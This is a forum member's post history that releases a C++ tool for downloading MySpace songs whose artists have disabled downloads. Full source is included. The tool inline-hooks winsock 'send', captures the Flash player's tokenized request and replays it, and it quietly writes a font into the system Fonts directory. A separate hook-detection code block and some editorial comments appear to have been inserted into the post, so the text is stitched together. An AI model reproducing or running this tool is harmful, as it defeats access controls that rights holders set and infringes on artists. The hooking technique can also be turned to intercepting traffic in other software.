Steve8x

Active Members
  • Posts: 181
Everything posted by Steve8x

  1. Thanks a lot! You helped me figure out how to make it actually work! It does basically the same thing you do with Wireshark, except it's automated! :) http://hak5.org/forums/index.php?showtopic=9693
  2. Version 2.1 is released. It has been improved and standardized!

changelog:

M'SpaceJuke v2.1 <> 10-29-08
===========================================
*Split the project up into separate files
*Now complies with C++ standards
*More compatible (ws2_32.dll is different in XP SP1 & SP2)
*More accurate download percentage by calculating it
*No longer messes up and freezes/crashes when you type an invalid friendid/url
*Made project in MSVC++ 2008 instead of Dev-Cpp!
*Uses a different font for edit box, combo box, and buttons...
*scanbuffer.dll removed, findstr function made in inline assembly instead.
*Reduced file size!

OK guys, I've been working on this all night and now I'm excited to share it with you! And best of all it's OPEN SOURCE! Artist disabled downloading? Well, Steve8x RE-enabled it ;) Version 2.1 is here and it's now better than ever! It no longer injects code into a web browser in order to function. It works entirely on its own! You can even download multiple songs at once! From multiple artists too, simultaneously!

I did a little playing around with the flash music players which Myspace has. I discovered how to make the mini flash player load any song I want, by encoding the friendID and songID and placing it in the URL of the mini player! Here's an image of me downloading songs with the latest version 2.1.

Here's how it works. You type in an artist URL or FRIEND ID. For the artist URL it's not the whole thing, just what's after "http://myspace.com/". Then click the "Get Songs" button to download the user's myspace page code, which will give the app the friendID. FriendIDs are needed to list the songs on the profile. So I made it so you can just type the URL, as that's easier to remember, and it will grab the friendID for you. If you type the URL/FriendID wrong it no longer crashes; instead it will just pop up an "Invalid Friend ID" messagebox! Select the song you want to download and click "Download".

It will then take the friendID of the user and the songID of the song you selected, encode them with base64, and sprintf the encoded strings into a mini.swf URL which once loaded will start playing the song you selected for download... Once that is done, it creates a new download window and creates a progress bar + some static text AND an internet explorer control within it. The internet explorer control loads the sprintf-formatted mini.swf URL, the flash music player loads, and your song starts playing in the download window... I have hooked winsock 'send' in my own app! Why? So that when the flash player loads the song and plays it, I copy the packet it sends and then I send it myself :) Since the flash player knows how to get the valid token, the packet is valid! The app then starts receiving the mp3, first the header along with a part of the mp3... The header contains "Content-Length: " which lets me know exactly how big the mp3 file is! That way I can show a percentage and a progress bar, and know when to stop receiving packets!

The mp3 files are saved into a folder called "downloads" created in the same directory where you ran M'SpaceJuke 2.1 from... Don't worry if you're downloading a song that has the same name as a previous song you've downloaded; it will not overwrite your downloads but instead change the file name like so... "song.mp3", "song_2.mp3", "song_3.mp3", etc... If you want to download multiple songs, I recommend muting (mute, not pause) the other ones besides the one you want to listen to at that time. Or just mute them all. As I don't think anybody likes to listen to multiple songs all at ONCE! That would give me a headache! Share your thoughts and be a tester! Give me some feedback on how well it works for you and ways I can improve it!
SOURCE CODE FOR VERSION 2.1 (MSVC++ 2008 Solution): http://popeax.com/download/apps/M'SpaceJuke-2.1-SRC.zip
BINARY FOR VERSION 2.1: http://popeax.com/download/apps/M'SpaceJuke-2.1.zip
Source code for older version 2.0 (left only for comparison of improvement) [Dev-Cpp Project]: http://popeax.com/download/apps/M'SpaceJuke2_SRC.zip

[M'SpaceJuke.h]

#ifndef MYSPACEJUKE_H
#define MYSPACEJUKE_H

//includes
#include "EasySockets.h"
#include "EasyControls.h"
#include "StrFunctions.h"
#include "BitstreamFont.h"
#include "base64.h"
#include <stdio.h>
#include <time.h>

//libs to link with
#pragma comment(lib, "ws2_32.lib")
#pragma comment(lib, "comctl32.lib")

//typedefs
typedef BOOL (CALLBACK* InitAtlAxWin)(void); // for loading SWF's in the download windows
InitAtlAxWin InitAtl;

//prototypes
LRESULT CALLBACK WndProc(HWND hWnd, UINT message, WPARAM wParam, LPARAM lParam);
LRESULT CALLBACK DownloadWndProc(HWND hWnd, UINT message, WPARAM wParam, LPARAM lParam);
void SendHook();
void SendHook2(DWORD sendbuffer, DWORD buffsize);
void HookWinsockSend();
void WorkerThread();
void DownloadThread();
void DownloadMP3();
void InstallFont();
int GetFriendID();
int ListSongs();

//variables
FILE* f = 0;
char* head = 0;
char* postdata = 0;
char* recvdata = 0;
char* artist = 0;
char* songs = 0;
char* bsid = 0;
char* magicalpacket = 0;
HWND hwnd, fID, GS, DB, song, dj, sngz;
HWND downloadwindows[32] = {0};
HWND swfplayers[32] = {0};
HWND progbars[32] = {0};
HWND txtz[32] = {0};
int hookenabled = 0, downloads = 0;
LRESULT selectedsong;
LOGFONT BitStream = {0};
HFONT hFont;

#endif

Here's the main cpp file's source, just so you can get a glimpse of the code here:

[M'SpaceJuke.cpp]

//M'SpaceJuke v2.1 - downloads songs from MySpace!
//even when the download link has been 'disabled' by the artist
//© 2008 Steve8x Inc.
//Version 2.1 - 10-29-08
//Made project comply with C++ standards
//Also fixed a couple small things

#include "M'SpaceJuke.h"

const char* host = "mediaservices.myspace.com";
const char* header = "GET /services/media/musicplayerxml.ashx?b=%s"; //friendID will be in place of '%s'
const char* footer = "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\nAccept: text/html, */*\r\nAccept-Language: en-us,en;q=0.5\r\nAccept-Encoding: identity\r\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\nConnection: close\r\n\r\n";
char friendid[200] = {0};
char dbg[200] = {0};
DWORD pSendHook = 0, pSendHook2 = 0, pReturnAddress = 0;
EasyControls* ctrl = new EasyControls;

int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmd, int nCmdShow)
{
    MSG Msg;
    WNDCLASSEX wc;
    ctrl->hInst = hInstance;
    wc.cbSize = sizeof(WNDCLASSEX);
    wc.hInstance = hInstance;
    wc.lpszClassName = L"M'SpaceJuke2_Class";
    wc.lpfnWndProc = WndProc;
    wc.style = CS_DBLCLKS;
    wc.hIcon = LoadIcon(hInstance, MAKEINTRESOURCE(101));
    wc.hIconSm = LoadIcon(hInstance, MAKEINTRESOURCE(101));
    wc.hCursor = LoadCursor(0, IDC_ARROW);
    wc.lpszMenuName = NULL;
    wc.cbClsExtra = 0;
    wc.cbWndExtra = 0;
    wc.hbrBackground = (HBRUSH)GetStockObject(0);
    RegisterClassEx(&wc);
    wc.lpszClassName = L"M'SpaceJuke2_Downloader_Class";
    wc.lpfnWndProc = DownloadWndProc;
    RegisterClassEx(&wc);

    // Initialize common controls library!
    ctrl->InitCommonCtrls(); // to make sure you can see the controls!

    //Create the window
    hwnd = CreateWindowExA(0, "M'SpaceJuke2_Class", "M'SpaceJuke v2.1", WS_OVERLAPPED | WS_CAPTION | WS_SYSMENU | WS_MINIMIZEBOX | WS_CLIPSIBLINGS, CW_USEDEFAULT, CW_USEDEFAULT, 288, 175, HWND_DESKTOP, 0, hInstance, 0);
    ctrl->text(hwnd, "FriendID:", 1, 1, 60, 22, 200);
    fID = ctrl->edit(hwnd, 1, 0, 0, 65, 1, 135, 22, 400);
    GS = ctrl->button(hwnd, "Get Songs", 202, 1, 80, 22, 420);
    ctrl->text(hwnd, "Select Song:", 1, 30, 100, 20, 201);
    song = ctrl->dropdown(hwnd, 0, 1, 50, 200, 200, 300);
    DB = ctrl->button(hwnd, "Download", 202, 50, 80, 22, 421);
    dj = ctrl->text(hwnd, "Artist: NULL", 1, 80, 288, 22, 202);
    sngz = ctrl->text(hwnd, "Songs: 0", 1, 100, 288, 22, 203);
    ctrl->text(hwnd, "© 2008 Steve8x", 85, 128, 150, 22, 204);
    InstallFont();
    SendMessage(fID, WM_SETFONT, (WPARAM)hFont, 1);
    SendMessage(song, WM_SETFONT, (WPARAM)hFont, 1);
    SendMessage(GS, WM_SETFONT, (WPARAM)hFont, 1);
    SendMessage(DB, WM_SETFONT, (WPARAM)hFont, 1);

    //Usage of new!!
    bsid = new char[200];
    artist = new char[200];
    songs = new char[10000];
    recvdata = new char[100000];
    magicalpacket = new char[1000];

    //Show our window
    ShowWindow(hwnd, nCmdShow);
    UpdateWindow(hwnd);
    InitAtl = (InitAtlAxWin)GetProcAddress(LoadLibraryA("atl"), "AtlAxWinInit");
    InitAtl();

    //Init winsock 2.2
    WSADATA wsaData = {0};
    WSAStartup(MAKEWORD(2, 2), &wsaData);
    HookWinsockSend(); //very important part :)

    while(GetMessage(&Msg, 0, 0, 0))
    {
        TranslateMessage(&Msg);
        DispatchMessage(&Msg);
    }
    return Msg.wParam;
}

LRESULT CALLBACK WndProc(HWND hWnd, UINT message, WPARAM wParam, LPARAM lParam)
{
    switch (message)
    {
    case WM_COMMAND:
        if(wParam == 420) //Get Songs button pressed
        {
            EnableWindow(fID, 0);
            EnableWindow(GS, 0);
            hookenabled = 0; //no point having the hook enabled here, since we're only getting the songs
            CreateThread(0, 0, (LPTHREAD_START_ROUTINE)&WorkerThread, 0, 0, 0);
        }
        if(wParam == 421) //Download button pressed
        {
            hookenabled = 1; //enable hook so we can capture the necessary packet!
            CreateThread(0, 0, (LPTHREAD_START_ROUTINE)&DownloadThread, 0, 0, 0);
        }
        break;
    case WM_LBUTTONDOWN: //I do this for all my apps, I like dragging the window from anywhere
        SendMessage(hWnd, WM_NCLBUTTONDOWN, HTCAPTION, lParam);
        break;
    case WM_CTLCOLORSTATIC:
        SetBkMode((HDC)wParam, TRANSPARENT);
        return (LRESULT)GetStockObject(WHITE_BRUSH);
        break;
    case WM_CLOSE:
        delete ctrl; //ctrl came from plain 'new', so plain 'delete' (the posted code used delete[] here, which is undefined behaviour)
        delete[] bsid;
        delete[] artist;
        delete[] songs;
        delete[] recvdata;
        delete[] magicalpacket;
        WSACleanup();
        PostQuitMessage(0);
        break;
    default:
        return DefWindowProc(hWnd, message, wParam, lParam);
    }
    return 0;
}

LRESULT CALLBACK DownloadWndProc(HWND hWnd, UINT message, WPARAM wParam, LPARAM lParam)
{
    switch (message)
    {
    case WM_LBUTTONDOWN:
        SendMessage(hWnd, WM_NCLBUTTONDOWN, HTCAPTION, lParam);
        break;
    case WM_CTLCOLORSTATIC:
        SetBkMode((HDC)wParam, TRANSPARENT);
        return (LRESULT)GetStockObject(WHITE_BRUSH);
        break;
    case WM_CLOSE: //Closing a download window does not stop the download
        DestroyWindow(hWnd);
        break;
    default:
        return DefWindowProc(hWnd, message, wParam, lParam);
    }
    return 0;
}

//Now let's get down to the nuts and bolts! :P
void _declspec(naked) SendHook()
{
    _asm
    {
        push ebp                        //required
        mov ebp, esp                    //required
        sub esp, 0x10                   //required
        push [ebp+0x10]                 //push size of send buffer into stack (as param)
        push [ebp+0x0C]                 //push pointer to send buffer into stack (as param)
        call dword ptr [pSendHook2]     //call my C++ function
        jmp dword ptr [pReturnAddress]  //jump back into WS2_32 'send' past the overwritten prologue bytes (+6 on SP1, +8 on SP2, see HookWinsockSend)
    }
}

void SendHook2(DWORD sendbuffer, DWORD buffsize)
{
    if(hookenabled == 1)
    {
        DWORD pToken = findstr((char*)sendbuffer, buffsize, "token=", 0);
        if(pToken != -1)
        {
            // 'token' was found in buffer so we found the right packet :)
            ZeroMemory(magicalpacket, 1000);
            memcpy(magicalpacket, (void*)sendbuffer, buffsize);
            CreateThread(0, 0, (LPTHREAD_START_ROUTINE)&DownloadMP3, 0, 0, 0);
        }
    }
}

//Hook Winsock In My Own APP. So I Can Intercept The Magical Packet
//Which Will Allow Me To Download The MP3 That's Playing In The Flash Player!
void HookWinsockSend()
{
    char* hookaddress = 0;
    //Set up for winsock 'send' hook
    DWORD sendaddress = (DWORD)GetProcAddress(GetModuleHandleA("ws2_32.dll"), "send");
    if(sendaddress == 0)
        sendaddress = (DWORD)&send;
    pSendHook = (DWORD)&SendHook;
    pSendHook2 = (DWORD)&SendHook2;

    //XP Service Pack 2 version of ws2_32.dll
    if(*(WORD*)sendaddress == 0xFF8B) // mov edi, edi (basically a two byte nop)
    {
        OutputDebugStringA("[myspacejuke] (XP-SP2) send bytes = {0x8B, 0xFF}");
        pReturnAddress = sendaddress + 8;
        hookaddress = (char*)sendaddress + 2;
    }
    //XP Service Pack 1 version of ws2_32.dll
    else if(*(WORD*)sendaddress == 0x8B55) //push ebp + 1 byte of next instruction
    {
        OutputDebugStringA("[myspacejuke] (XP-SP1) send bytes = {0x55, 0x8B}");
        pReturnAddress = sendaddress + 6;
        hookaddress = (char*)sendaddress;
    }
    else //Should never happen! but you never know!
    {
        char cdate[9] = {0};
        char ctime[9] = {0};
        _strdate(cdate);
        _strtime(ctime);
        f = fopen("errorlog.txt", "wb");
        sprintf(dbg, "%s %s\r\n\r\nWinsock Hook Failed!\r\nFirst 20 Bytes Of Send:\r\n", cdate, ctime);
        fwrite(dbg, strlen(dbg), 1, f);
        hookaddress = (char*)sendaddress;
        BYTE temp = 0;
        for(int i = 0; i < 20; i++)
        {
            temp = *(BYTE*)&hookaddress[i];
            sprintf(dbg, "\r\n[%i]: 0x%X", i, temp);
            fwrite(dbg, strlen(dbg), 1, f);
        }
        fclose(f);
        MessageBoxA(0, "Failed to hook winsock \"send\" \nEmail me the \"errorlog.txt\" so I can fix it!\nAlso state which version of windows you have + service packs\n\nSteve8x@live.com", "Winsock Hook Failed!", 0);
        ExitProcess(0);
    }

    //unprotect the right 6 bytes of the beginning of 'send' for the hook
    DWORD oldprotect = 0;
    VirtualProtect(hookaddress, 6, PAGE_EXECUTE_READWRITE, &oldprotect);
    //replace start of winsock 'send' with (JMP DWORD PTR [pointertosendhook])
    *(WORD*)hookaddress = 0x25FF;
    *(DWORD*)&hookaddress[2] = (DWORD)&pSendHook;
    // winsock 'send' is now hooked :)
}

void WorkerThread()
{
    xClient* cli = new xClient;
    head = new char[1000];
    postdata = new char[10000];
    ZeroMemory(friendid, 200);
    ZeroMemory(head, 1000);
    ZeroMemory(postdata, 10000);
    ZeroMemory(recvdata, 10000);
    GetWindowTextA(fID, friendid, 200);
    sprintf(postdata, "GET /%s HTTP/1.1\r\nHost: www.myspace.com\r\n%s", friendid, footer);
    //connect to server using my class ;)
    cli->ConnectToServer("myspace.com", 80);
    sendx(cli->serversock, postdata, strlen(postdata));
    recvx(cli->serversock, recvdata, 10000);
    cli->Close();
    if(GetFriendID() == 0)
    {
        EnableWindow(fID, 1);
        EnableWindow(GS, 1);
        MessageBoxA(0, "Invalid Friend ID!", "ERROR!", MB_ICONEXCLAMATION);
        goto cleanup;
    }
    sprintf(head, header, friendid);
    sprintf(postdata, "%s HTTP/1.1\r\nAccept: */*\r\nConnection: close\r\nHost: %s\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n\r\n", head, host);
    ZeroMemory(recvdata, 10000);
    cli->ConnectToServer((char*)host, 80);
    sendx(cli->serversock, postdata, strlen(postdata));
    recvx(cli->serversock, recvdata, 10000);
    cli->Close();
    int numsongs = ListSongs();
    sprintf(dbg, "Songs: %i", numsongs);
    SetWindowTextA(sngz, dbg);
    EnableWindow(fID, 1);
    EnableWindow(GS, 1);
cleanup:
    delete cli;
    delete[] head;
    delete[] postdata;
    ExitThread(0);
}

int GetFriendID()
{
    char* bandid = recvdata;
    DWORD pInvalid = findstr(recvdata, strlen(recvdata), "Invalid Friend ID", 0);
    if(pInvalid != -1)
        return 0;
    DWORD pFriendID = findstr(recvdata, strlen(recvdata), "DisplayFriendId\":", 1);
    if(pFriendID == -1)
        return 0;
    bandid = ((char*)pFriendID + 17);
    int stringsize = GetStrSize(bandid, ',', 0);
    ZeroMemory(friendid, 200);
    memcpy(friendid, bandid, stringsize);
    return 1;
}

int ListSongs() //scans through XML file in buffer and puts the songs into the listbox
{
    DWORD i = 0;
    int numsongs = 0;
    char* title = recvdata;
    ZeroMemory(artist, 200);
    ZeroMemory(songs, 10000);
    SendMessage(song, CB_RESETCONTENT, 0, 0); // clears the list box
    DWORD pName = findstr(title, strlen(title), "<name>", 0);
    if(pName == -1) // -1 means string was not found, should not happen
        return 0;
    title = ((char*)pName + 15);
    int stringsize = GetStrSize(title, ']', 0);
    memcpy(artist, title, stringsize);
    if(strcmp("This artist does not exist", artist) == 0)
    {
        return 0;
    }
    sprintf(dbg, "Artist: %s", artist);
    SetWindowTextA(dj, dbg);
nextsong:
    while(cmp(title, "title=\"", 7) == 0) // locate song title
    {
        if(cmp(title, "</playlist>", 11) == 1)
        {
            //end of songs in xml file reached
            SendMessage(song, CB_SHOWDROPDOWN, 1, 0);
            return numsongs;
        }
        title++;
    }
    title += 7; // get past 'title="'
    stringsize = GetStrSize(title, 0x22, 0);
    //copy song name into string array
    memcpy(&songs[i], title, stringsize);
    //Add song name to list box
    SendMessageA(song, CB_ADDSTRING, 0, (LPARAM)&songs[i]);
    i += (stringsize + 1); //calculate next string offset
    numsongs++;
    goto nextsong;
}

void DownloadThread()
{
    char* swfurl = new char[1000];
    char* songurl = recvdata;
    int stringsize = 0;
    selectedsong = SendMessage(song, CB_GETCURSEL, 0, 0);
    int selected = selectedsong + 1;
    while(selected != 0) // locate bsid/songid of song selected and store it
    {
        ZeroMemory(bsid, 200);
        while(cmp(songurl, "bsid=\"", 6) == 0)
        {
            songurl++;
        }
        songurl += 6;
        stringsize = GetStrSize(songurl, 0x22, 0);
        memcpy(bsid, songurl, stringsize);
        songurl++;
        selected--;
    }
    //encode songid/bsid, friendid/bandid, and autoplay boolean for URL to be valid
    std::string song = base64_encode((const unsigned char*)bsid, strlen(bsid));
    std::string band = base64_encode((const unsigned char*)friendid, strlen(friendid));
    std::string unknown = "MTIyMTA0Njk5NQ==";
    std::string AutoPlay = base64_encode((const unsigned char*)"True", 4);
    //then we can have the mini flash player load any song we want :)
    ZeroMemory(swfurl, 1000);
    sprintf(swfurl, "http://lads.myspace.com/mini/mini.swf?b=%s&o=%s&d=%s&i=%s&a=%s&u=%s", song.c_str(), band.c_str(), unknown.c_str(), band.c_str(), AutoPlay.c_str(), band.c_str());
    downloadwindows[downloads] = CreateWindowExA(0, "M'SpaceJuke2_Downloader_Class", "Downloading...", WS_OVERLAPPED | WS_CAPTION | WS_SYSMENU | WS_MINIMIZEBOX | WS_CLIPSIBLINGS, CW_USEDEFAULT, CW_USEDEFAULT, 303, 150, HWND_DESKTOP, 0, ctrl->hInst, 0);
    CreateWindowExA(0, "AtlAxWin", swfurl, WS_VISIBLE | WS_CHILD, 1, 1, 300, 55, downloadwindows[downloads], 0, ctrl->hInst, 0);
    progbars[downloads] = ctrl->progbar(downloadwindows[downloads], 1, 60, 294, 15, 0);
    txtz[downloads] = ctrl->text(downloadwindows[downloads], "Loading...", 1, 80, 300, 22, 0);
    ShowWindow(downloadwindows[downloads], 1);
    UpdateWindow(downloadwindows[downloads]);
    downloads++;
    MSG Msg;
    while(GetMessage(&Msg, 0, 0, 0))
    {
        TranslateMessage(&Msg);
        DispatchMessage(&Msg);
    }
    delete[] swfurl;
    ExitThread(0);
}

void DownloadMP3()
{
    xClient* cli = new xClient;
    char* mp3bytes = new char[1048576]; // allocate 1MB buffer to recv mp3 in...
    char* songpath = new char[1000];
    char* host = new char[100];
    char* contentlength = new char[100];
    int selected = selectedsong;
    int d_id = downloads - 1;
    char* songName = songs;
    while(selected != 0)
    {
        int strsize = strlen(songName) + 1;
        songName += strsize;
        selected--;
    }
    ZeroMemory(songpath, 1000);
    CreateDirectoryA("downloads", 0);
    sprintf(songpath, "downloads\\%s.mp3", songName);
    //check if file exists first, and if so change the name a little so we don't overwrite the existing song
    int songNum = 2;
checkagain:
    f = fopen(songpath, "rb");
    if(f)
    {
        fclose(f);
        sprintf(songpath, "downloads\\%s_%i.mp3", songName, songNum);
        songNum++;
        goto checkagain;
    }
    SetWindowTextA(txtz[d_id], songpath);
    ZeroMemory(host, 100);
    DWORD pHost = findstr(magicalpacket, strlen(magicalpacket), "Host: ", 1);
    char* findhost = ((char*)pHost + 6);
    int strsize = GetStrSize(findhost, 0, 1);
    memcpy(host, findhost, strsize);
    //here's where the fun part begins!
    ZeroMemory(mp3bytes, 1048576);
    cli->ConnectToServer(host, 80);
    hookenabled = 0; // disable hook so we don't end up in an indefinite loop :)
    sendx(cli->serversock, magicalpacket, strlen(magicalpacket));
    hookenabled = 1; // we can re-enable after we send the packet!
    recvx(cli->serversock, mp3bytes, 1000); // recv part of the mp3 + header containing 'Content-Length' which is the size of the mp3
    ZeroMemory(contentlength, 100);
    DWORD pContentLen = findstr(mp3bytes, strlen(mp3bytes), "Content-Length: ", 1);
    char* contentlen = ((char*)pContentLen + 16);
    strsize = GetStrSize(contentlen, 0, 1);
    memcpy(contentlength, contentlen, strsize);
    unsigned long ContentLen = atoi(contentlength); // convert string to number
    sprintf(dbg, "Mp3 File Size = %u bytes", ContentLen);
    OutputDebugStringA(dbg);
    char* mp3head = mp3bytes;
    while(*(DWORD*)mp3head != 0x0A0D0A0D) // \r\n\r\n
    {
        mp3head++;
    }
    mp3head += 4;
    DWORD mp3headsize = 0;
    char* endofmp3head = mp3head;
    while(*(DWORD*)endofmp3head != 0)
    {
        mp3headsize++;
        endofmp3head++;
    }
    DWORD byteswritten = 0;
    HANDLE hMP3 = CreateFileA(songpath, GENERIC_WRITE, FILE_SHARE_READ, 0, CREATE_ALWAYS, 0, 0);
    WriteFile(hMP3, mp3head, mp3headsize, &byteswritten, 0);
    unsigned long ContentLenDownloaded = byteswritten;
    DWORD blocksize = ContentLen / 66;
    float percentage = ((float)ContentLenDownloaded / (float)ContentLen) * 100.0f;
    SendMessage(progbars[d_id], PBM_SETPOS, (int)percentage, 0);
    DWORD bytesleft = 0;
    //RECEIVING MP3 AND WRITING TO FILE! YAY :)
    while(ContentLenDownloaded < ContentLen)
    {
        bytesleft = ContentLen - ContentLenDownloaded;
        ZeroMemory(mp3bytes, 1048576);
        sendx(cli->serversock, "!", 1); //keep-alive (i think)
        if(bytesleft < blocksize)
        {
            recvx(cli->serversock, mp3bytes, bytesleft);
            WriteFile(hMP3, mp3bytes, bytesleft, &byteswritten, 0);
        }
        else
        {
            recvx(cli->serversock, mp3bytes, blocksize);
            WriteFile(hMP3, mp3bytes, blocksize, &byteswritten, 0);
        }
        ContentLenDownloaded += byteswritten;
        percentage = ((float)ContentLenDownloaded / (float)ContentLen) * 100.0f;
        SendMessage(progbars[d_id], PBM_SETPOS, (int)percentage, 0);
        sprintf(dbg, "Downloading... [%.2f%% Done!]", percentage);
        SetWindowTextA(downloadwindows[d_id], dbg);
        //sprintf(dbg, "downloaded = %u, total = %u, bytesleft = %u", ContentLenDownloaded, ContentLen, bytesleft);
        //OutputDebugString(dbg);
    }
    CloseHandle(hMP3);
    cli->Close();
    SetWindowTextA(downloadwindows[d_id], "Downloading... [100% Done!]");
    SendMessage(progbars[d_id], PBM_SETPOS, 100, 0);
    delete cli;
    delete[] mp3bytes;
    delete[] songpath;
    delete[] host;
    delete[] contentlength;
    //keep arrays packed
    downloadwindows[d_id] = downloadwindows[downloads-1];
    progbars[d_id] = progbars[downloads-1];
    txtz[d_id] = txtz[downloads-1];
    downloads--;
    ExitThread(0);
}

void InstallFont()
{
    char WinDir[260] = {0};
    char Slash[2] = "\\";
    char Fontz[] = "Fonts\\VeraMono.ttf";
    GetSystemDirectoryA(WinDir, 260);
    for(int i = 3; i < sizeof(WinDir); i++)
    {
        if(WinDir[i] == Slash[0])
        {
            for(int z = 0; z < sizeof(Fontz); z++)
            {
                i++;
                WinDir[i] = Fontz[z];
            }
            break;
        }
    }
    f = fopen(WinDir, "rb");
    if(f)
    {
        fclose(f);
        OutputDebugStringA("Bitstream Font Is Already Installed!");
    }
    else
    {
        f = fopen(WinDir, "wb");
        fwrite(&BitstreamFont, sizeof(BitstreamFont), 1, f);
        fclose(f);
        AddFontResourceA("VeraMono.ttf");
        OutputDebugStringA("Bitstream Font Was Installed Successfully!");
    }
    BitStream.lfHeight = 14;
    BitStream.lfWeight = 420;
    wcscpy(BitStream.lfFaceName, L"Bitstream Vera Sans Mono");
    hFont = CreateFontIndirect(&BitStream);
}
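A defensive counterpart to the hook in HookWinsockSend above, added here as an example and not part of Steve8x's code: the post overwrites the first bytes of ws2_32!send with JMP DWORD PTR [pSendHook] (at +0 for the 55 8B prologue, at +2 for the 8B FF hot-patch prologue). An integrity check or EDR spots exactly this by reading the function's first bytes back, via the same GetProcAddress(GetModuleHandleA("ws2_32.dll"), "send") the post uses, and comparing them against the known prologues. The byte arrays below are constructed samples and the function names are mine.

```c
/* Inline-hook check for the two ws2_32!send prologues the post describes.
 * On Windows you would fill 'code' with memcpy(code, GetProcAddress(...), 8);
 * here the bytes are constructed samples so the check runs anywhere. */
#include <stddef.h>
#include <stdio.h>
#include <string.h>

enum prologue_state {
    PROLOGUE_CLEAN = 0,   /* one of the two known send prologues, untouched */
    PROLOGUE_HOOKED = 1,  /* JMP DWORD PTR [imm32] (FF 25) or JMP rel32 (E9) at the patch point */
    PROLOGUE_UNKNOWN = 2  /* neither pattern: another ws2_32.dll build, the post's errorlog case */
};

/* Known-good prologues quoted in the post:
 *   XP SP1: 55 8B EC 83 EC 10        push ebp / mov ebp,esp / sub esp,10h
 *   XP SP2: 8B FF 55 8B EC 83 EC 10  mov edi,edi (hot-patch nop) / push ebp / mov ebp,esp / sub esp,10h */
static const unsigned char SP1_PROLOGUE[] = {0x55, 0x8B, 0xEC, 0x83, 0xEC, 0x10};
static const unsigned char SP2_PROLOGUE[] = {0x8B, 0xFF, 0x55, 0x8B, 0xEC, 0x83, 0xEC, 0x10};

/* Constructed samples (not dumps from a real machine): clean, hooked the way the post does it, and unknown. */
const unsigned char SAMPLE_CLEAN_SP1[]  = {0x55, 0x8B, 0xEC, 0x83, 0xEC, 0x10};
const unsigned char SAMPLE_CLEAN_SP2[]  = {0x8B, 0xFF, 0x55, 0x8B, 0xEC, 0x83, 0xEC, 0x10};
const unsigned char SAMPLE_HOOKED_SP1[] = {0xFF, 0x25, 0x78, 0x56, 0x34, 0x12, 0xEC, 0x10};       /* FF 25 at +0 */
const unsigned char SAMPLE_HOOKED_SP2[] = {0x8B, 0xFF, 0xFF, 0x25, 0x78, 0x56, 0x34, 0x12};       /* FF 25 at +2 */
const unsigned char SAMPLE_REL_JMP[]    = {0xE9, 0x10, 0x00, 0x00, 0x00, 0xEC, 0x10, 0x90};       /* E9 rel32 trampoline style */
const unsigned char SAMPLE_UNKNOWN[]    = {0xC3};                                                  /* just 'ret' */

/* True if a 6-byte JMP DWORD PTR [addr] or a 5-byte JMP rel32 starts at p. */
static int is_jmp_patch(const unsigned char *p, size_t n)
{
    if (n >= 6 && p[0] == 0xFF && p[1] == 0x25) return 1;   /* FF 25 disp32 */
    if (n >= 5 && p[0] == 0xE9) return 1;                   /* E9 rel32 */
    return 0;
}

enum prologue_state classify_send_prologue(const unsigned char *code, size_t n)
{
    if (n >= sizeof SP2_PROLOGUE && memcmp(code, SP2_PROLOGUE, sizeof SP2_PROLOGUE) == 0)
        return PROLOGUE_CLEAN;
    if (n >= sizeof SP1_PROLOGUE && memcmp(code, SP1_PROLOGUE, sizeof SP1_PROLOGUE) == 0)
        return PROLOGUE_CLEAN;
    /* The post patches at +0 for the SP1 layout and at +2 (after mov edi,edi) for SP2. */
    if (is_jmp_patch(code, n))
        return PROLOGUE_HOOKED;
    if (n >= 2 && code[0] == 0x8B && code[1] == 0xFF && is_jmp_patch(code + 2, n - 2))
        return PROLOGUE_HOOKED;
    return PROLOGUE_UNKNOWN;
}

/* For an FF 25 hook, the disp32 operand is the address of the pointer slot the
 * JMP reads (pSendHook in the post), decoded little-endian; 0 if no FF 25 hook. */
unsigned long hook_slot_or_zero(const unsigned char *code, size_t n)
{
    const unsigned char *p = code;
    if (n >= 2 && p[0] == 0x8B && p[1] == 0xFF) { p += 2; n -= 2; }
    if (n < 6 || p[0] != 0xFF || p[1] != 0x25) return 0;
    return (unsigned long)p[2] | ((unsigned long)p[3] << 8) |
           ((unsigned long)p[4] << 16) | ((unsigned long)p[5] << 24);
}

int main(void)
{
    const char *names[] = {"clean", "hooked", "unknown"};
    printf("SP2 clean : %s\n", names[classify_send_prologue(SAMPLE_CLEAN_SP2, sizeof SAMPLE_CLEAN_SP2)]);
    printf("SP2 hooked: %s, slot=0x%08lx\n",
           names[classify_send_prologue(SAMPLE_HOOKED_SP2, sizeof SAMPLE_HOOKED_SP2)],
           hook_slot_or_zero(SAMPLE_HOOKED_SP2, sizeof SAMPLE_HOOKED_SP2));
    return 0;
}
```

A slot address that lies outside every loaded module's image (the post's pSendHook lives in the EXE's data) is the detail a memory scanner reports alongside the verdict.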
  3. @Mr Funk great to see you solved your problem! @digip Does that still work? Getting the URL to the song on myspace and downloading it? I thought you USED to be able to do that but they changed it so you can't anymore... by randomly changing the name of the mp3 file stored on the server. I used to do it too, but you only had like a 10 second window to be downloading the file; if you were too slow then the file would already have its name changed and you'd get a file not found error... I'm guessing you haven't tried this recently? To prove you wrong I created a sample program! It sends a packet to mediaservices.myspace.com with a friendID to get the xml file which holds the song playlist info, which has fields specifying the url of the song to download... it seems as if the url always gives a 404 error, not even allowing that 10 second window anymore! :( It's a DevCPP project. Specify a friend ID and click "Get Songs"; it will display the songs the music myspace page has in the list box. Then select a song and click download and it will find which url is for the selected song and load the url into your default web browser for download... Sad thing is, you get a 404: file not found error no matter how fast you click download!!! So if I'm doing it wrong please let me know how I can fix my program to be able to get it to work, try it with your wireshark again and let me know your results... else I'll have to figure out how to convert an RTMP stream into an mp3 file...
project files: http://popeax.com/myspacejuke.zip

source:

//Myspace Juke v1.0 - downloads songs from myspace
//even when the download link is not available
//by Steve8x

#include <winsock2.h>
#include <windows.h>
#include <stdio.h>
#include "EasyControls.h"
#include "EasySockets.h" // Simple Winsock Classes

char* HOST = "mediaservices.myspace.com";
char* HEADER = "GET /services/media/musicplayerxml.ashx?b=%s"; //friendID will be in place of '%s'

//hInst, hwnd, fID and song are globals this file uses without declaring them; the assumption is that EasyControls.h declares them for its Create*Ex helpers
LRESULT CALLBACK WndProc(HWND hWnd, UINT message, WPARAM wParam, LPARAM lParam); //prototype added: WinMain references WndProc before its definition
void WorkerThread(void);
